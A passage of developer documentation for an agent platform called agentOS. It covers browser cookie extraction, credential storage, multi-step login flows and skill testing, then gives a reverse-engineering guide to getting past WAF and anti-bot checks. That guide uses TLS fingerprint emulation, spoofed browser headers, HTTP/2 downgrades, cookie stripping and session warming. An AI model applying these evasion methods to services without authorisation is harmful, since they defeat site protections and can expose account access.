- In-memory cache — cookies from the last extraction, updated by
Set-Cookieresponses from our own HTTP requests (writeback). Can be newer than the browser when a server rotates tokens. - Browser providers (Brave, Firefox) — fresh extraction from the browser’s local cookie database (~20ms). Reflects the user’s latest browsing.
- Credential store (
credentials.sqlite) — persistent copy, also updated by writeback. Survives engine restart.
The candidate with the highest newest_cookie_at (latest per-cookie timestamp) wins. On ties, the cache wins (first candidate). No TTL — timestamps are the only arbiter.
Playwright is always skipped unless explicitly requested via the provider parameter. It’s used for reverse engineering and login automation, not runtime auth.
Provider scoring (within the provider tier)
When multiple browser providers return cookies for the same domain:
- Required names — providers with all cookies listed in
auth.namesscore highest - Creation timestamp — most recently created cookies win
- Cookie count — final tiebreaker
Retry on auth failure
On SESSION_EXPIRED: prefix (or Python exceptions containing 401, 403,
unauthorized, forbidden), the engine:
- Marks the current provider as failed
- Excludes it from the candidate list
- Re-runs provider selection — next-best provider wins
- Retries the operation once with the new provider’s cookies
This means a skill with stale Brave cookies and fresh Playwright cookies will automatically fall back to Playwright after Brave fails. One retry only — no infinite loops.
Explicit provider override
For testing or when auto-selection picks wrong:
run({ skill: "amazon", tool: "list_orders", provider: "playwright" })
The provider argument bypasses the selection heuristic entirely.
Providers always return the full cookie jar
The names field in connection auth is purely a selection hint — it helps
the engine choose the right provider. Providers always return all cookies for the
domain, never a filtered subset. Skills that need the full cookie jar (which is
most of them) work correctly regardless of whether names is declared.
Key rules
- Never import Playwright in skill Python code. Playwright is a separate skill for investigation. Skill operations use
agentos.http. - All I/O through SDK modules.
http.get/post,shell.run,sql.query. Neverurllib,subprocess,sqlite3,requests,httpx. - Never expose secrets in
__result__. Secrets go in__secrets__only. The agent sees masked versions viametadata.masked. _callis same-skill only. It dispatches to sibling operations within the same skill (e.g. Gmail’slist_emailscallingget_email). It cannot call operations in other skills.- Cross-skill coordination goes through the agent. If a login flow needs email access, the operation yields back to the agent (see below), and the agent uses whatever email capability is available.
Agent-in-the-loop auth flows
Some login flows require input the skill can’t obtain on its own — a verification code from email, an SMS code, or user approval. These flows must yield back to the agent rather than trying to handle the dependency internally.
Why not handle it in Python?
_callis same-skill only — Python can’t callgmail.search_emailsfrom insideexa.py- Hardcoding a specific email skill (Gmail) couples the skill to that provider — what if the user uses Mimestream?
- Blocking in Python for 60 seconds while polling gives the agent no visibility or control
The multi-step pattern
Split the flow so the agent orchestrates between agentos.http operations and Playwright when needed:
Agent calls skill.send_login_code({ email })
→ Python/agentos.http: CSRF + trigger verification email
→ Returns: { status: "code_sent", hint: "..." }
Agent checks email (any provider) and extracts the code
Agent uses Playwright to complete login (if `agentos.http` can't replay the code submission)
→ Navigate to login page, type email, submit, type code, submit
→ Extract cookies from browser
Agent calls skill.store_session_cookies({ email, session_token, ... })
→ Python/agentos.http: validates session, stores via __secrets__
The hint field tells the agent what to search for (e.g. “subject ‘Sign in to Exa Dashboard’ from exa.ai”). The agent knows how to search email — it picks the right provider and extracts the code.
Why Playwright for the code submission? Some auth implementations (e.g. Exa’s NextAuth) submit verification codes via a native HTML form POST that HTTPX cannot replay — the server-side handling differs from a programmatic POST. The fetch interceptor captures nothing, but the browser navigates successfully. When this happens, use Playwright for the form submission step and agentos.http for everything else.
When to use this pattern
- Email verification codes (Exa, any NextAuth email provider)
- SMS/TOTP verification
- OAuth consent that requires user approval
- Any flow where the skill needs external input it can’t obtain via
_call - Any step where
agentos.httpreplay fails but the browser works (native form POSTs, complex redirect chains)
Example: Exa
See skills/exa/exa.py:
send_login_code— triggers the verification email (HTTPX)store_session_cookies— validates and stores browser-extracted session cookies (HTTPX)- The agent uses Playwright between these two operations to enter the code and complete login
Future: session-scoped state
Passing CSRF tokens through params works but is noisy. The target is session-scoped temporary storage (tied to the MCP/agent session) so Python can write state in step 1 and read it in step 2 without the agent seeing the plumbing. See the engine roadmap for “Session-scoped state for auth flows.”
For the full reverse engineering methodology, see:
- Auth & Runtime — credential bootstrap lifecycle, network interception, cookie mechanics, CSRF patterns, web navigation
- NextAuth.js guide — vendor-specific patterns for NextAuth/Auth.js sites
- WorkOS guide — vendor-specific patterns for WorkOS-based auth
Data & Storage
Sandbox storage
Skills can persist state across runs using two reserved keys on their graph node:
cache— regeneratable state (discovered endpoints, scraped tokens). Can be cleared at any time; the skill re-discovers on next run.data— persistent state (settings, preferences, sync timestamps). Survives cache clears.
If losing it requires user action to recover (re-entering a setting), it’s data. If the skill can regenerate it, it’s cache.
Reading
The execution context always includes .data and .cache:
{ "params": { ... }, "auth": { ... }, "data": { ... }, "cache": { ... } }
In YAML expressions:
rest:
url: '(.cache.graphql_endpoint // "https://fallback.example.com/graphql")'
In Python, pass cache and/or data via args::
python:
module: ./my_script.py
function: search
args:
query: .params.query
cache: .cache
Writing back
Python and command executors write back using reserved keys in their return value:
__cache__— merged into the skill node’s cache__data__— merged into the skill node’s data__result__— the actual result callers see
def discover_endpoint(cache=None, **kwargs):
if cache and cache.get("graphql_endpoint"):
return {"endpoint": cache["graphql_endpoint"]}
endpoint = _discover()
return {
"__cache__": {"graphql_endpoint": endpoint},
"__result__": {"endpoint": endpoint},
}
If neither __cache__ nor __data__ is present, the result passes through unchanged. Fully backward compatible.
__secrets__ — secret store writes
A third reserved key, __secrets__, handles importing secrets from external sources (password managers, payment info, identity documents, etc.) into the credential store. The __secrets__ handler is pure credential store CRUD — it writes credential rows and strips the key. It does not create graph entities or edges; entity creation happens through the normal adapter pipeline processing __result__. The two systems are joined by (issuer, identifier).
def import_items(vault, dry_run=False):
items = fetch_from_source(vault)
if dry_run:
return [{"issuer": i["issuer"], "label": i["label"]} for i in items]
return {
# Secrets → credential store (engine writes rows, strips key)
"__secrets__": [
{
"item_type": "password",
"issuer": "github.com",
"identifier": "joe",
"label": "GitHub",
"source": "mymanager",
"value": {"password": "..."},
"metadata": {"masked": {"password": "••••••••"}}
},
{
"item_type": "credit_card",
"issuer": "chase",
"identifier": "visa-4242",
"label": "Personal Visa",
"source": "mymanager",
"value": {"card_number": "4111111111114242", "cvv": "123"},
"metadata": {"masked": {"card_number": "••••4242", "cvv": "•••"}}
}
],
# Entities → shaped by adapters into graph nodes
"__result__": [
{"issuer": "github.com", "identifier": "joe", "title": "GitHub",
"category": "LOGIN", "url": "https://github.com", "username": "joe"},
{"issuer": "chase", "identifier": "visa-4242", "title": "Personal Visa",
"category": "CREDIT_CARD", "cardholder": "Joe", "card_type": "Visa",
"expiry": "12/2027", "masked": {"card_number": "••••4242", "cvv": "•••"}}
]
}
The trust model: Python sees secrets (it reads them from the source), the engine intercepts and encrypts them, the agent never sees them — only metadata (including masked representations). Graph entities carry masked previews (“Visa ending in 4242”) so the agent can reason about which card to use without seeing the full number.
See spec/credential-system.md and spec/1password-integration.md in the engine repo for full design.
Status: Implemented (Phase A). The engine intercepts __secrets__ in process_storage_writeback(), writes credential rows to credentials.sqlite, creates account entities and claims edges on the graph, then strips the key before the MCP response.
Leading by example: skills/goodreads/public_graph.py (GraphQL endpoint discovery cached via __cache__).
Expressions
Use one expression style everywhere:
rest:,graphql:,command:,python:, and connection auth fields all use jq/jaq-style expressions- Resolved credentials are available under
.auth.*such as.auth.keyor.auth.access_token
Common jq/jaq patterns:
url: '"/items/" + .params.id'
query:
q: .params.query
limit: .params.limit // 10
body:
title: .params.title
Common command patterns:
command:
binary: python3
args:
- ./my_script.py
- run
stdin: '.params | tojson'
When a command: argument or working_dir: looks like a relative file path, it is resolved relative to the skill folder. Prefer ./my_script.py over machine-specific absolute paths.
If you need advanced command, steps, or crypto behavior, copy from an existing skill.
Views & Output
The run tool accepts:
view:
detail: preview | full
format: markdown | json
Rules:
detailchanges data volumeformatchanges representation- Default is markdown preview
- Preview keeps canonical fields and truncates long
text - Full returns all mapped fields
- JSON returns a
{ data, meta }envelope
This is why canonical mapping fields matter — the renderer uses them to produce consistent previews across all skills. See Adapters for the canonical field table.
Testing & Validation
Shape validation: agentos test
The primary tool for validating that skill output matches declared shapes. Run it after any skill change.
agentos test hackernews # test all operations
agentos test amazon --op search_products # test one operation
This loads skill.yaml and shapes/*.yaml from disk, executes each testable operation, and validates the output field-by-field against the shape. No running engine needed.
hackernews
──────────
list_posts (post[])
✓ 20 records returned (485ms)
✓ author — 20/20 valid
✓ datePublished — 20/20 valid
✓ name — 20/20 valid
✓ url — 20/20 valid
⚠ 3 extra fields not in shape: account, engagement, skill
search_posts (post[]) — skipped (required params missing from test.params)
4 operations · 1 tested · 3 skipped
Test configuration
Add a test: block to operations in skill.yaml to provide test params or skip dangerous operations:
operations:
search_products:
returns: product[]
test:
params: # input params for test execution
query: "usb c cable"
create_order:
returns: order
test:
skip: true # has side effects — don't auto-run
| Field | Type | Default | Purpose |
|---|---|---|---|
params | object | {} | Params passed to the operation during test |
skip | boolean | false | Skip this operation in automated test runs |
When operations are skipped:
skip: true— explicitly opted out- Required params have no defaults and no
test.params returnsisvoidor an inline schema (not a shape reference)- The shape referenced in
returnsdoesn’t exist in the registry
When operations run:
- Operations with no params run automatically
- Operations with all-optional params (or params with defaults) run automatically
- Operations with
test.paramscovering required params run with those params
Direct MCP testing
For inspecting the full MCP response (including rendering, entity extraction, and metadata), use direct MCP calls:
Skill-level testing (community repo)
mcp:call and mcp:test automatically use the newest built agentos binary. Set AGENTOS_BINARY=/path/to/agentos if you need to force a specific one.
# JSON preview
npm run mcp:call -- \
--skill exa --tool search \
--params '{"query":"rust ownership","limit":1}' \
--format json --detail preview
# JSON full
npm run mcp:call -- \
--skill exa --tool search \
--params '{"query":"rust ownership","limit":1}' \
--format json --detail full
# Markdown full (raw MCP response)
npm run mcp:call -- \
--skill exa --tool search \
--params '{"query":"rust ownership","limit":1}' \
--detail full --raw
Engine-level testing (core repo)
The core repo has a generic MCP test harness at ~/dev/agentos/scripts/mcp-test.mjs that speaks raw JSON-RPC to the engine binary:
cd ~/dev/agentos
# List all MCP tools (built-in + dynamic)
node scripts/mcp-test.mjs stdio "./target/release/agentos mcp"
# Call a dynamic capability tool
node scripts/mcp-test.mjs stdio "./target/release/agentos mcp" call web_search '{"query":"rust"}'
Use this when you’re changing provides: entries, engine routing, or tool schemas.
Quick smoke test: agentos call
Native Rust MCP client built into the binary — fastest path for one-off checks:
agentos call boot # verify engine is alive
agentos call run '{"skill":"exa","tool":"search","params":{"query":"test"}}'
Validation
Before committing a skill:
npm run validate # schema + structural checks
agentos test <skill> # shape validation
npm run mcp:call -- --skill <skill> ... # inspect full MCP output
What validate catches:
- Schema shape and unknown keys (via
audit-skills.pyvs Rusttypes.rs) - Basic structural problems
- Advisory duplicate adapter mappings
What agentos test catches:
- Field type mismatches (value doesn’t match declared shape type)
- Extra fields returned but not declared in the shape
- Missing shape fields (info only — fields are optional)
- Relation target validation (nested records checked recursively)
Checklist
Before you commit a skill:
-
npm run validatepasses -
agentos test <skill>passes (no field errors) - Direct MCP preview/full output looks correct
- Uses inline
returns:schemas for non-entity or action-style tools - Read-safe ops have
test.paramsfor automated testing - Mutating ops declare
test.skip: true - Multi-connection skill declares
connection:on each operation - REST URLs are relative when the connection has a
base_url - If the contract changed, the book is updated in the same PR
Reverse Engineering
How to build skills against web services that don’t have public APIs. This is the methodology for extracting data surfaces, auth flows, and content from any website — then packaging them as reliable AgentOS skills.
The layers
Each layer builds on the previous. Start at transport, work up.
| Layer | What it covers | When you need it |
|---|---|---|
| 1. Transport | TLS fingerprinting, WAF bypass, Playwright stealth, HTTP/2 | Service blocks automated requests |
| 2. Discovery | Next.js/Apollo caches, JS bundle config, GraphQL schema scanning | Finding API endpoints and data shapes |
| 3. Auth & Runtime | Credential bootstrap, login/signup flows, CSRF, cookies, API key management, network interception | Logging in and managing session state |
| 4. Content | Pagination, infinite scroll, content extraction | Scraping actual data from pages |
| 5. Social Networks | Social graph traversal, friend lists, activity feeds | Working with social platforms |
| 6. Desktop Apps | Electron asar extraction, native app IPC, plist configs | Local apps without web APIs |
| 7. MCP Servers | Wrapping existing MCP servers as skills | When someone already built an MCP server |
Core principle
CDP discovers, agentos.http runs.
Use browse capture (CDP to a real browser) to investigate — navigate pages, capture every network request with full headers and response bodies, inspect cookies. Then implement what you learned as Python + agentos.http in the skill. No browser at runtime.
Why CDP to real browsers, not Playwright? Playwright’s bundled Chromium has a detectable TLS fingerprint (JA3/JA4) that anti-bot systems flag. CDP to the user’s real Brave/Chrome produces authentic TLS fingerprints, real GPU canvas rendering, and uses existing sessions. Sites like Amazon reject Playwright but accept real browsers. See Transport for the full analysis.
Headers are built in Python via http.headers() with independent knobs (waf=, accept=, mode=, extra=). The Rust engine is pure transport — it sets zero default headers.
The progression:
- Search — check
web_searchfor prior art, existing docs, API references. - Discover — use
browse captureto probe the live site via CDP. Launch Brave with--remote-debugging-port=9222 --remote-allow-origins="*", thenpython3 bin/browse-capture.py <url> --port 9222. Captures all requests, responses, headers, cookies, and API response bodies automatically. - Extract API surface — grep the site’s JS bundles for endpoint patterns (e.g.
grep -oE 'get[A-Z][a-zA-Z]+V[0-9]+' bundle.js). This reveals the full API surface without navigating every page. - Replay — reproduce what you found with
agentos.http+ cookies. Usehttp.headers()for WAF bypass. Test withagentos browse request <skill> <url>. - Implement — write the skill operation in Python with
agentos.http. No browser dependency at runtime. - Test —
agentos test-skill <skill>validates against shapes and expectations.
Browse toolkit commands
| Command | What it does |
|---|---|
agentos browse request <skill> <url> | Make an authenticated HTTP request (same TLS fingerprint as engine), show full headers, cookies, response |
agentos browse cookies <skill> | Cookie inventory — all cookies from all sources with timestamps and provenance |
agentos browse auth <skill> | Auth resolution trace — which provider won, identity, timing |
python3 bin/browse-capture.py <url> --port 9222 | CDP network capture — navigate Brave to a URL, capture every request/response with full headers and bodies |
See Browse Toolkit spec for details.
See Auth & Runtime for the full methodology, including:
- Credential Bootstrap Lifecycle — the five-phase pattern from entry through API key storage
- Network Interception — three layers:
capture_networkfor page-load, fetch interceptors for user interactions, DOM inspection for native form POSTs - Cookie Mechanics — SameSite, HttpOnly, cross-domain behavior, extraction methods
- CSRF Patterns — double-submit cookies, synchronizer tokens, NextAuth CSRF
- Web Navigation — redirect chains, interstitials, signup vs login, API key management flows
- Playwright Gotchas —
typevsfillfor React forms, honeypot fields, and when HTTPX replay fails - Vendor guides — NextAuth.js, WorkOS
Write operations — replay, don’t reconstruct
Write operations (creating orders, adding to carts, submitting forms) are where most RE bugs hide. The API accepts your request (200 OK) but stores degraded data because your payload was subtly wrong.
Principles
1. Replay, don’t reconstruct. Capture a working browser request and replay its exact structure. If the browser sends 15 fields on a cart item, send 15 fields. Don’t “simplify” to the 6 you think matter. The 9 you dropped might include section UUIDs, selling options, or measurement types that the server needs to properly resolve the item.
2. Trace data provenance. For every field in a write request, document which read endpoint provided the value. Don’t just document the shape — document the data flow:
getStoreV1.catalogSectionsMap[secKey][i].catalogSectionUUID
→ addItemsToDraftOrderV2.items[].sectionUuid
getStoreV1...catalogItems[].sectionUUID
→ addItemsToDraftOrderV2.items[].sectionUuid (different! item-level, not parent)
3. Compare field-by-field. After making a write call, compare your result against browser-created state. Don’t just check “200 OK” or “items exist.” Check: do items have images? Prices? Can the browser render them normally? Grayed-out images or “Nothing to eat here” means your data was accepted but degraded.
4. Preserve raw data. When extracting from a read endpoint, keep the original response data alongside your clean shape. Your clean shape is for display; the raw data is for downstream write operations that need the exact fields the API expects back. Don’t lossy-extract into your own shape and throw away the original.
5. Hook BOTH fetch AND XHR. Some sites use fetch() for reads but XMLHttpRequest for writes
(Uber Eats does this). If you only hook one, you’ll miss the write calls entirely.
6. No silent fallbacks on writes. Never use raw.get("X") or alternative_source for fields
in write operations. If the field is missing, fail loudly — the error message will reveal the
actual bug (wrong casing, wrong nesting, missing data). The or pattern is fine for display
but poison for writes: the API silently accepts wrong data and you don’t find out until the
UI shows “unavailable” or grayed-out images.
Real example: Uber Eats cart bug
We captured addItemsToDraftOrderV2 and built item payloads ourselves. The API returned 200,
items appeared in the cart with correct names and prices. But images were grayed out and clicking
items showed “Nothing to eat here.” Root cause: we used the wrong sectionUuid and subsectionUuid
(same UUID for all items instead of per-item values from the catalog), and omitted sellingOption.
The server accepted the items but couldn’t resolve them against the catalog properly.
Fix: pass through the raw catalog item data from getStoreV1 instead of reconstructing it.
Starting a new reverse-engineered skill
npm run new-skill -- my-service
# Then start investigating:
# 1. Open the service in Playwright
# 2. capture_network to find API endpoints
# 3. inspect to understand page structure
# 4. Document what you find in requirements.md
# 5. Implement with httpx in Python
For detailed examples, see each layer’s documentation. Real-world reference implementations:
| Skill | What it demonstrates |
|---|---|
skills/uber/ | Two completely different APIs on one platform — rides use GraphQL (riders.uber.com/graphql), Eats uses RPC (ubereats.com/_p/api/). CDP browse capture for API discovery, JS bundle grepping for full endpoint surface (32 endpoints extracted), receipt HTML parsing with data-testid selectors, real-time event channels (SSE), separate cookie domains. Reference for CDP-based discovery and RPC API reverse engineering. |
skills/amazon/ | Deep anti-bot bypass (client hints, Siege encryption, session warming), session staleness (30-min TTL, CDP session warming), fallback CSS selector chains for resilient HTML parsing, AJAX endpoints for dynamic content, SESSION_EXPIRED provider retry convention, tiered cookie architecture. Full reference for 1-transport and 4-content. |
skills/exa/ | Full credential bootstrap: NextAuth email code → Playwright form submit → session cookies → API key extraction from dashboard API. Reference for nextauth.md |
skills/goodreads/ | Multi-tier discovery, Apollo cache extraction, auth boundary mapping, runtime config fallback |
skills/claude/ | Cookie-based auth, Cloudflare stealth settings, API replay from browser session |
skills/austin-boulder-project/ | JS bundle config extraction, tenant-namespace auth |
Reverse Engineering — Transport & Anti-Bot
How to get a response from a server that doesn’t want to talk to you.
This is Layer 1 of the reverse-engineering docs:
- Layer 1: Transport (this file) — TLS fingerprinting, headers, WAF bypass, headless stealth
- Layer 2: Discovery — 2-discovery — finding structured data in pages and bundles
- Layer 3: Auth & Runtime — 3-auth — credentials, sessions, rotating config
- Layer 4: Content — 4-content — extracting data from HTML when there is no API
- Layer 5: Social Networks — 5-social — modeling people, relationships, and social graphs
- Layer 6: Desktop Apps — 6-desktop-apps — macOS, Electron, local state, unofficial APIs
- Layer 7: MCP Servers — 7-mcp — discovering, probing, and evaluating remote/stdio MCPs
HTTP Client — agentos.http Routes Through the Engine
The short answer
from agentos import http
# Default — works for most JSON APIs
resp = http.get(url, **http.headers(accept="json"))
# Behind CloudFront/Cloudflare — WAF headers + HTTP/2
resp = http.get(url, **http.headers(waf="cf", accept="json"))
# Full page navigation (Amazon, Goodreads)
with http.client(cookies=cookie_header) as c:
resp = c.get(url, **http.headers(waf="cf", mode="navigate", accept="html"))
All HTTP goes through the Rust engine via agentos.http. The engine handles transport mechanics (HTTP/2, cookie jars, decompression, timeouts, logging). Headers are built in Python via http.headers() — the engine sets zero default headers.
Default rule: ALWAYS use
http.headers(). Never construct headers dicts manually. We are acting as a real browser (Brave/Chrome). There is no reason to NOT send proper browser headers. Withouthttp.headers(), you get no User-Agent, no sec-ch-, no Sec-Fetch- — and some APIs silently reject you with 500 or 403. Pass service-specific headers (CSRF tokens, session IDs) via theextra=parameter.# WRONG — no browser headers, will fail on strict endpoints http.post(url, cookies=cookies, headers={"x-csrf-token": "x"}, json=body) # RIGHT — browser-grade headers + service-specific extras http.post(url, cookies=cookies, json=body, **http.headers(waf="cf", accept="json", extra={"x-csrf-token": "x"}))
TLS fingerprinting — why the engine uses wreq with BoringSSL
AWS WAF, Cloudflare, and other CDNs compute a JA3/JA4 fingerprint from every TLS ClientHello and compare it to the claimed User-Agent. If the UA says “Chrome 131” but the TLS fingerprint says “rustls” or “urllib3,” the request gets flagged as a bot. Sensitive pages (Amazon orders, Chase banking, account settings) have higher anomaly thresholds than product pages — so the homepage works but the orders page redirects to login.
The engine uses wreq (a reqwest fork) backed by BoringSSL — the same TLS library Chrome uses. With Emulation::Chrome131, every request produces an authentic Chrome JA4 fingerprint (t13d1516h2_8daaf6152771), including correct HTTP/2 SETTINGS frames, pseudo-header order, and WINDOW_UPDATE values. This is not string-matching — wreq constructs the same ClientHello Chrome would, using the same library, and the fingerprint falls out naturally.
Verified (2026-04-01): Same cookies from Brave Browser. reqwest (rustls) → Amazon redirects to signin. wreq (BoringSSL, Chrome 131) → Amazon returns 7 orders. The only difference was the TLS fingerprint.
Python clients (requests, httpx) have similar issues — requests/urllib3 has a blocklisted JA3 hash (8d9f7747675e24454cd9b7ed35c58707). Skills don’t hit this because all HTTP goes through the engine’s wreq client, not Python libraries directly.
When to use http2=False (Vercel)
Vercel Security Checkpoint blocks HTTP/2 clients outright — every request
returns 429 with a JS challenge page, regardless of cookies or headers. But
HTTP/1.1 passes cleanly.
In http.headers(), this is handled by the waf= knob:
# waf="cf" → http2=True (CloudFront/Cloudflare need HTTP/2)
resp = http.get(url, **http.headers(waf="cf", accept="json"))
# waf="vercel" → http2=False (Vercel blocks HTTP/2)
resp = http.get(url, **http.headers(waf="vercel", accept="json"))
The WAF template automatically sets the right http2 value. No need to remember which WAF needs what.
Not every Vercel-hosted endpoint enables the checkpoint. During Exa testing,
auth.exa.ai (Vercel, no checkpoint) accepted h2; dashboard.exa.ai
(Vercel, checkpoint enabled) rejected it. The checkpoint is a per-project
Vercel Firewall setting — you have to test each subdomain.
Tested against dashboard.exa.ai (Vercel + Cloudflare):
http2=True | http2=False | |
|---|---|---|
| session + cf_clearance | 429 | 200 |
| session only | 429 | 200 |
| no cookies at all | 429 | 200 (empty session) |
Cookies and headers are irrelevant — the checkpoint triggers purely on the HTTP/2 TLS fingerprint.
Rule of thumb: use waf="cf" for CloudFront/Cloudflare, waf="vercel" for Vercel. If you get 429 from Vercel, it’s the HTTP/2 fingerprint. If you get 403 from CloudFront, you need HTTP/2 + client hints.
Diagnostic protocol: isolating the variable
When a request fails, don’t guess — isolate. Test each transport variable independently to find the one that matters:
Step 1: Try httpx http2=True (default)
→ Works? Done.
→ 429/403? Continue.
Step 2: Try httpx http2=False
→ Works? Vercel Security Checkpoint. Use http2=False, done.
→ Still 403? Continue.
Step 3: Try with full browser-like headers (Sec-Fetch-*, Sec-CH-UA, etc.)
→ Works? WAF header check. Add headers, done.
→ Still 403? Continue.
Step 4: Try with valid session cookies
→ Works? Auth required. Handle login first.
→ Still 403? It's TLS fingerprint-level.
Step 5: Use curl_cffi with Chrome impersonation
→ Works? Strict JA3/JA4 enforcement. Use curl_cffi.
→ Still 403? Something non-standard (CAPTCHA, IP block).
The key insight from the Exa reverse engineering session: test one variable
at a time. During Exa testing, we created a matrix of http2=True/False x
cookies/no-cookies x headers/no-headers and discovered that ONLY the h2
setting mattered. Cookies and headers were completely irrelevant to the
Vercel checkpoint. This prevented unnecessary complexity in the skill code.
You don’t need curl_cffi or httpx
The engine’s wreq client already emits Chrome’s exact TLS cipher suites, GREASE values, extension ordering, ALPN, and HTTP/2 SETTINGS frames. Skills should never use httpx, requests, or curl_cffi directly — agentos.http handles all of this automatically.
All I/O through SDK modules
Skills must use agentos.http for all HTTP — never urllib, requests, httpx, or subprocess directly. All I/O goes through SDK modules (http.get/post, shell.run, sql.query) so the engine can log, gate, and manage requests.
Browser-Like Headers — http.headers() Knobs
Headers are built in Python via http.headers(), which composes four independent concerns:
from agentos import http
# Four knobs, ordered by network layer:
conf = http.headers(
waf="cf", # WAF vendor — "cf", "vercel", or None
ua="chrome-desktop", # User-Agent — preset name or raw string
mode="fetch", # Request type — "fetch" (XHR) or "navigate" (page load)
accept="json", # Content — "json", "html", or "any"
extra={"X-Custom": "value"}, # Merge last, overrides anything
)
# Returns {"headers": {...}, "http2": True/False}
# Spread into http.get/post/client with **
resp = http.get(url, **conf)
What each knob controls
| Knob | What it sets | Values |
|---|---|---|
waf | Client hints (Sec-CH-UA, etc.) + http2 | "cf" (CloudFront/Cloudflare, http2=True), "vercel" (http2=False), None |
ua | User-Agent header | "chrome-desktop", "chrome-mobile", "safari-desktop", or raw string |
mode | Sec-Fetch-* headers (only when waf is set) | "fetch" (XHR: dest=empty, mode=cors), "navigate" (page: dest=document, mode=navigate + device hints) |
accept | Accept header | "json", "html", "any" (default: */*) |
extra | Custom headers merged last | Any dict — auth tokens, CSRF, Origin, Referer, etc. |
Standard headers (always included)
Every http.headers() call sets User-Agent, Accept-Language, and Accept-Encoding. These are normal browser headers — not WAF-specific. Override via extra= if needed.
WAF headers — waf="cf" and mode="navigate"
When waf is set, http.headers() adds Sec-Fetch-* metadata. The mode knob controls what type of request you’re simulating:
mode="fetch" (default) — XHR/fetch() API call:
Sec-Fetch-Dest: empty,Sec-Fetch-Mode: cors,Sec-Fetch-Site: same-origin
mode="navigate" — Full page navigation (used by Amazon, Goodreads):
Sec-Fetch-Dest: document,Sec-Fetch-Mode: navigate,Sec-Fetch-User: ?1- Plus device hints:
Device-Memory,Downlink,DPR,ECT,RTT,Viewport-Width - Plus
Cache-Control: max-age=0,Upgrade-Insecure-Requests: 1
Amazon’s Lightsaber bot detection checks these device hints. Without them, auth pages redirect to login. The mode="navigate" knob handles all of this automatically.
Sec-Fetch-Site values
| Scenario | Value | How to set |
|---|---|---|
JS on app.example.com calling app.example.com/api | same-origin | Default in mode="fetch" |
| Full page navigation (user typed URL) | none | Default in mode="navigate" |
| Cross-origin API call | cross-site | extra={"Sec-Fetch-Site": "cross-site"} |
Common patterns
from agentos import http
# JSON API, no WAF (Gmail, Linear, Todoist — 15 skills)
resp = http.get(url, **http.headers(accept="json", extra={"Authorization": f"Bearer {token}"}))
# HTML scraping behind CloudFront (Amazon, Goodreads)
with http.client(cookies=cookie_header) as c:
resp = c.get(url, **http.headers(waf="cf", mode="navigate", accept="html"))
# JSON API behind Cloudflare (Claude.ai)
# Claude needs custom Sec-CH-UA (Brave v146) and http2=False
conf = http.headers(waf="cf", accept="json", extra=CLAUDE_HEADERS)
conf["http2"] = False # override WAF default
with http.client(cookies=cookie_header, **conf) as c:
resp = c.get(url)
# Vercel checkpoint bypass (Exa)
resp = http.get(url, **http.headers(waf="vercel", accept="json"))
# Full control — skip helpers entirely
resp = http.get(url, headers={"Accept": "text/csv", "X-Custom": "value"})
# Debug — print what you're sending
print(http.headers(waf="cf", mode="navigate", accept="html"))
Version drift
The Chrome version in Sec-CH-UA is pinned in sdk/agentos/http.py (_UA and _WAF dicts).
If you start getting unexpected 403s months later, the pinned version may be too old.
Update the version strings in the SDK to match the current stable Chrome release.
How to discover the right headers
Use the Playwright skill’s capture_network or the fetch interceptor to see exactly
what headers a real browser sends on the same request. Compare with http.headers() output
and add any missing ones via extra=.
Cookie Stripping — Disabling Client-Side Features
Some sites inject JavaScript-driven features via cookies. When you’re scraping with HTTPX (no JS engine), these features produce unusable output. The fix: strip the trigger cookies so the server falls back to plain HTML.
Amazon’s Siege Encryption
Amazon uses a system called SiegeClientSideDecryption to encrypt page content
client-side. When the csd-key cookie is present, Amazon sends encrypted HTML
blobs instead of readable content. The browser decrypts them with JavaScript;
HTTPX gets unreadable garbage.
Solution: strip the trigger cookies using skip_cookies= on http.client():
_SKIP_COOKIES = ["csd-key", "csm-hit", "aws-waf-token"]
with http.client(cookies=cookie_header, skip_cookies=_SKIP_COOKIES,
**http.headers(waf="cf", mode="navigate", accept="html")) as c:
resp = c.get(url)
The engine filters these cookies out of the jar before sending. With csd-key stripped, Amazon serves plain, parseable HTML. The csm-hit and aws-waf-token cookies are also stripped — they’re telemetry/WAF cookies that can trigger additional client-side behavior.
Diagnosing encryption
If your HTML responses contain garbled content, long base64 strings, or empty containers where data should be, check for client-side decryption:
- Compare the page source in the browser (View Source, not DevTools Elements) with your HTTPX response
- Search for keywords like
decrypt,Siege,clientSidein the page JS - Try stripping cookies one at a time to find which one triggers encryption
Reference: skills/amazon/amazon.py SKIP_COOKIES.
Response Decompression — You Must Handle What You Advertise
When you send Accept-Encoding: gzip, deflate, br, zstd (as all browser-like profiles do), the server will compress its response. Your HTTP client must decompress it. If it doesn’t, you get raw binary garbage instead of HTML — and every parser returns zero results.
This is a silent failure. The HTTP status is 200, the headers look normal, and Content-Length is reasonable. But resp.text is garbled bytes. It looks like client-side encryption (see above), but the cause is much simpler: the response is compressed and you’re not decompressing it.
How agentos.http handles it
The Rust HTTP engine uses wreq with gzip, brotli, deflate, and zstd feature flags enabled. Decompression is automatic and transparent — resp["body"] is always plaintext.
Why this matters
Brotli (RFC 7932) is a compression algorithm designed by Google for the web. It compresses 20-26% better than gzip on HTML/CSS/JS. Every modern browser supports it, and servers aggressively use it for large pages. Amazon’s order history page, for example, returns ~168KB of brotli-compressed HTML. Without decompression, you get 168KB of binary noise and zero order cards.
The trap: small pages (homepages, API endpoints) may not be compressed or may use gzip which some clients handle by default. Large pages (order history, dashboards, search results) almost always use brotli. So your skill works on simple endpoints and silently fails on the important ones.
Diagnostic
If your response body contains non-UTF-8 bytes, starts with garbled characters, or contains no recognizable HTML despite a 200 status:
- Check the response
Content-Encodingheader — if it saysbr,gzip, orzstd, the body is compressed - Verify your HTTP client has decompression enabled
- In agentOS:
agentos.httphandles this automatically. If you’re using rawurllib.request, it does NOT decompress brotli
Reference: Cargo.toml wreq features — gzip, brotli, deflate, zstd.
Session Warming
Some services track request patterns and flag direct deep-links from an unknown session as bot traffic. The fix: warm the session by visiting the homepage first, then navigate to the target page.
def _warm_session(client) -> None:
"""Visit homepage first to provision session cookies."""
client.get("https://www.amazon.com/", headers={"Sec-Fetch-Site": "none"})
This establishes the session context (cookies, CSRF tokens, tracking state) before hitting authenticated pages. Without it, Amazon redirects order history and account pages to the login page even with valid session cookies.
When to warm:
- Before any authenticated page fetch (order history, account settings)
- When the first request to a deep URL returns a login redirect despite valid cookies
- When you see WAF-level blocks only on direct navigation
When warming isn’t needed:
- API endpoints (JSON responses) — they don’t use page-level session tracking
- Public pages without authentication
- Sites where direct deep-links work fine (test first)
Reference: skills/amazon/amazon.py _warm_session().
Headless Browser Stealth
